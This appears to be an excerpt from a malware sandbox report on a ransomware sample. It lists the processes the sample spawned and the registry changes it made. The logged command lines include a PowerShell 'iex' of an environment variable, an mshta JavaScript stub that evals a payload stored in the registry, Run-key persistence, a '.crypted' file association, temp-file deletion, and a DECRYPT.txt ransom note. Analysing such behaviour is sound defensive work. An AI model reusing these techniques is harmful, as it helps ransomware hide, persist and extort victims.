![]() ![]() "wscript.exe" (Access type: "DELETEVAL" Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS" Key: "PROXYSERVER") "wscript.exe" (Access type: "SETVAL" Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS" Key: "PROXYENABLE" Value: "00000000") Spawned process "powershell.exe" with commandline "iex $env:maqd" ( Show Process) Spawned process "mshta.exe" with commandline "javascript:dy1Ze="MQu3V" h2s3=new ActiveXObject("WScript.Shell") Lr3wQccZ="jpCGxF" uPR3t=h2s3.RegRead("HKCU\\software\\qSIFiaX64\\FtHYf2x") nOi7FF6="tR3" eval(uPR3t) YOQA8="KeCW2" " ( Show Process) Spawned process "cmd.exe" with commandline "/c DEL "%TEMP%\php4ts.dll"" ( Show Process) Spawned process "cmd.exe" with commandline "/c DEL "%TEMP%\a.exe"" ( Show Process) Spawned process "cmd.exe" with commandline "/c DEL "%TEMP%\a.php"" ( Show Process) Spawned process "notepad.exe" with commandline ""%TEMP%\a.txt"" ( Show Process) Spawned process "WmiPrvSE.exe" with commandline "%WINDIR%\system32\wbem\wmiprvse.exe -secured -Embedding" ( Show Process) Spawned process "cmd.exe" with commandline "/c notepad.exe "%TEMP%\a.txt"" ( Show Process) Spawned process "a.exe" with commandline ""%TEMP%\a.php"" ( Show Process) Spawned process "reg.exe" with commandline "REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"%TEMP%\a.txt\""" ( Show Process) Spawned process "reg.exe" with commandline "REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"" ( Show Process) Spawned process "reg.exe" with commandline "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "%TEMP%\a.txt"" ( Show Process) Spawned process "cmd.exe" with commandline "/c %TEMP%\a.exe "%TEMP%\a.php"" ( Show Process) Spawned process "cmd.exe" with commandline "/c copy /y "%TEMP%\a.txt" "%USERPROFILE%\Desktop\DECRYPT.txt"" ( Show Process) Spawned process "cmd.exe" with commandline "/c copy /y "%APPDATA%\Desktop\DECRYPT.txt"" ( Show Process) 
Spawned process "cmd.exe" with commandline "/c REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"%TEMP%\a.txt\""" ( Show Process) Spawned process "cmd.exe" with commandline "/c REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"" ( Show Process) Spawned process "cmd.exe" with commandline "/c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "%TEMP%\a.txt"" ( Show Process) Spawned process "wscript.exe" with commandline ""C:\f"" ( Show Process) Detected text artifact in screenshot that indicates the file is ransomware